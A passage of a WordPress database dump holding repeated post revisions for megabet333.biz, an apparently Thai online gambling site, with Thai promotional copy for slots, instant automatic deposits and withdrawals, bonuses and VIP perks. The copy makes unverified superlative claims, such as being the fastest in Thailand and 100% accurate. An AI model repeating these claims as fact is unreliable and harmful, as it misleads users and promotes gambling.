08:17:59','2025-10-23 08:17:59','',29,'https://megabet333.biz/?p=112',0,'revision','',0),(113,3,'2025-10-23 08:18:15','2025-10-23 08:18:15','','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:18:15','2025-10-23 08:18:15','',29,'https://megabet333.biz/?p=113',0,'revision','',0),(114,3,'2025-10-23 08:18:15','2025-10-23 08:18:15','','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:18:15','2025-10-23 08:18:15','',29,'https://megabet333.biz/?p=114',0,'revision','',0),(115,3,'2025-10-23 08:18:16','2025-10-23 08:18:16','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:18:16','2025-10-23 08:18:16','',29,'https://megabet333.biz/?p=115',0,'revision','',0),(116,3,'2025-10-23 08:20:38','2025-10-23 08:20:38','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:20:38','2025-10-23 08:20:38','',29,'https://megabet333.biz/?p=116',0,'revision','',0),(117,3,'2025-10-23 08:20:38','2025-10-23 08:20:38','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:20:38','2025-10-23 08:20:38','',29,'https://megabet333.biz/?p=117',0,'revision','',0),(118,3,'2025-10-23 08:20:38','2025-10-23 08:20:38','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-start=\"355\" data-end=\"698\">ในยุคนี้ 2025 เรียนกได้ว่าเป็นยุคแห่งเทคโนโลยีเลยก็ได้ว่า ยุคที่ทุกอย่างต้องเร็วและสะดวก สล็อตเว็บตรง megabet เองก็ต้องปรับตัวให้ทันสมัยเช่นกัน และหนึ่งในระบบที่เปลี่ยนประสบการณ์การเล่นเกมของนักเดิมพันไทยไปอย่างสิ้นเชิงก็คือ ระบบฝากถอนออโต้จากเว็บ Megabet333 ที่ขึ้นชื่อว่าเร็วที่สุดในไทย ใช้เวลาเพียง 5 วินาทีเท่านั้น เงินก็เข้าบัญชีทันที ไม่ต้องรอแอดมิน ไม่ต้องส่งสลิปให้ยุ่งยากอีกต่อไป เว็บเมก้าเบทถือเป็นผู้นำด้านเทคโนโลยีระบบอัตโนมัติในวงการสล็อตออนไลน์ ด้วยการพัฒนาแพลตฟอร์มเชื่อมต่อกับ API จากผู้ให้บริการธนาคารโดยตรง ทำให้ทุกการฝากถอนเป็นแบบเรียลไทม์ ปลอดภัย และแม่นยำ 100% ไม่ว่าคุณจะฝากหลักสิบหรือถอนหลักแสน ระบบก็ประมวลผลได้ทันที ช่วยให้คุณเล่นเกมสล็อตได้ต่อเนื่องแบบไม่สะดุด</p>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:20:38','2025-10-23 08:20:38','',29,'https://megabet333.biz/?p=118',0,'revision','',0),(119,3,'2025-10-23 08:23:13','2025-10-23 08:23:13','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-start=\"355\" data-end=\"698\">ในยุคนี้ 2025 เรียนกได้ว่าเป็นยุคแห่งเทคโนโลยีเลยก็ได้ว่า ยุคที่ทุกอย่างต้องเร็วและสะดวก สล็อตเว็บตรง megabet เองก็ต้องปรับตัวให้ทันสมัยเช่นกัน และหนึ่งในระบบที่เปลี่ยนประสบการณ์การเล่นเกมของนักเดิมพันไทยไปอย่างสิ้นเชิงก็คือ ระบบฝากถอนออโต้จากเว็บ Megabet333 ที่ขึ้นชื่อว่าเร็วที่สุดในไทย ใช้เวลาเพียง 5 วินาทีเท่านั้น เงินก็เข้าบัญชีทันที ไม่ต้องรอแอดมิน ไม่ต้องส่งสลิปให้ยุ่งยากอีกต่อไป เว็บเมก้าเบทถือเป็นผู้นำด้านเทคโนโลยีระบบอัตโนมัติในวงการสล็อตออนไลน์ ด้วยการพัฒนาแพลตฟอร์มเชื่อมต่อกับ API จากผู้ให้บริการธนาคารโดยตรง ทำให้ทุกการฝากถอนเป็นแบบเรียลไทม์ ปลอดภัย และแม่นยำ 100% ไม่ว่าคุณจะฝากหลักสิบหรือถอนหลักแสน ระบบก็ประมวลผลได้ทันที ช่วยให้คุณเล่นเกมสล็อตได้ต่อเนื่องแบบไม่สะดุด</p>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:23:13','2025-10-23 08:23:13','',29,'https://megabet333.biz/?p=119',0,'revision','',0),(120,3,'2025-10-23 08:23:13','2025-10-23 08:23:13','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-start=\"355\" data-end=\"698\">ในยุคนี้ 2025 เรียนกได้ว่าเป็นยุคแห่งเทคโนโลยีเลยก็ได้ว่า ยุคที่ทุกอย่างต้องเร็วและสะดวก สล็อตเว็บตรง megabet เองก็ต้องปรับตัวให้ทันสมัยเช่นกัน และหนึ่งในระบบที่เปลี่ยนประสบการณ์การเล่นเกมของนักเดิมพันไทยไปอย่างสิ้นเชิงก็คือ ระบบฝากถอนออโต้จากเว็บ Megabet333 ที่ขึ้นชื่อว่าเร็วที่สุดในไทย ใช้เวลาเพียง 5 วินาทีเท่านั้น เงินก็เข้าบัญชีทันที ไม่ต้องรอแอดมิน ไม่ต้องส่งสลิปให้ยุ่งยากอีกต่อไป เว็บเมก้าเบทถือเป็นผู้นำด้านเทคโนโลยีระบบอัตโนมัติในวงการสล็อตออนไลน์ ด้วยการพัฒนาแพลตฟอร์มเชื่อมต่อกับ API จากผู้ให้บริการธนาคารโดยตรง ทำให้ทุกการฝากถอนเป็นแบบเรียลไทม์ ปลอดภัย และแม่นยำ 100% ไม่ว่าคุณจะฝากหลักสิบหรือถอนหลักแสน ระบบก็ประมวลผลได้ทันที ช่วยให้คุณเล่นเกมสล็อตได้ต่อเนื่องแบบไม่สะดุด</p>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:23:13','2025-10-23 08:23:13','',29,'https://megabet333.biz/?p=120',0,'revision','',0),(121,3,'2025-10-23 08:23:14','2025-10-23 08:23:14','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-start=\"355\" data-end=\"698\">ในยุคนี้ 2025 เรียนกได้ว่าเป็นยุคแห่งเทคโนโลยีเลยก็ได้ว่า ยุคที่ทุกอย่างต้องเร็วและสะดวก สล็อตเว็บตรง megabet เองก็ต้องปรับตัวให้ทันสมัยเช่นกัน และหนึ่งในระบบที่เปลี่ยนประสบการณ์การเล่นเกมของนักเดิมพันไทยไปอย่างสิ้นเชิงก็คือ ระบบฝากถอนออโต้จากเว็บ Megabet333 ที่ขึ้นชื่อว่าเร็วที่สุดในไทย ใช้เวลาเพียง 5 วินาทีเท่านั้น เงินก็เข้าบัญชีทันที ไม่ต้องรอแอดมิน ไม่ต้องส่งสลิปให้ยุ่งยากอีกต่อไป เว็บเมก้าเบทถือเป็นผู้นำด้านเทคโนโลยีระบบอัตโนมัติในวงการสล็อตออนไลน์ ด้วยการพัฒนาแพลตฟอร์มเชื่อมต่อกับ API จากผู้ให้บริการธนาคารโดยตรง ทำให้ทุกการฝากถอนเป็นแบบเรียลไทม์ ปลอดภัย และแม่นยำ 100% ไม่ว่าคุณจะฝากหลักสิบหรือถอนหลักแสน ระบบก็ประมวลผลได้ทันที ช่วยให้คุณเล่นเกมสล็อตได้ต่อเนื่องแบบไม่สะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ Megabet333 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ Megabet333 โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ Megabet333</strong></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><strong>ด้วยระบบนี้ Megabet333 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</strong></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2025-10-23 08:23:14','2025-10-23 08:23:14','',29,'https://megabet333.biz/?p=121',0,'revision','',0),(122,3,'2025-10-23 08:28:44','2025-10-23 08:28:44','','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:28:44','2025-10-23 08:28:44','',44,'https://megabet333.biz/?p=122',0,'revision','',0),(123,3,'2025-10-23 08:28:44','2025-10-23 08:28:44','','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:28:44','2025-10-23 08:28:44','',44,'https://megabet333.biz/?p=123',0,'revision','',0),(124,3,'2025-10-23 08:28:44','2025-10-23 08:28:44','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:28:44','2025-10-23 08:28:44','',44,'https://megabet333.biz/?p=124',0,'revision','',0),(125,3,'2025-10-23 08:29:56','2025-10-23 08:29:56','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:29:56','2025-10-23 08:29:56','',44,'https://megabet333.biz/?p=125',0,'revision','',0),(126,3,'2025-10-23 08:29:56','2025-10-23 08:29:56','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:29:56','2025-10-23 08:29:56','',44,'https://megabet333.biz/?p=126',0,'revision','',0),(127,3,'2025-10-23 08:29:56','2025-10-23 08:29:56','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:29:56','2025-10-23 08:29:56','',44,'https://megabet333.biz/?p=127',0,'revision','',0),(128,3,'2025-10-23 08:30:37','2025-10-23 08:30:37','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:30:37','2025-10-23 08:30:37','',44,'https://megabet333.biz/?p=128',0,'revision','',0),(129,3,'2025-10-23 08:30:37','2025-10-23 08:30:37','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:30:37','2025-10-23 08:30:37','',44,'https://megabet333.biz/?p=129',0,'revision','',0),(130,3,'2025-10-23 08:30:37','2025-10-23 08:30:37','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:30:37','2025-10-23 08:30:37','',44,'https://megabet333.biz/?p=130',0,'revision','',0),(131,3,'2025-10-23 08:33:34','2025-10-23 08:33:34','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, 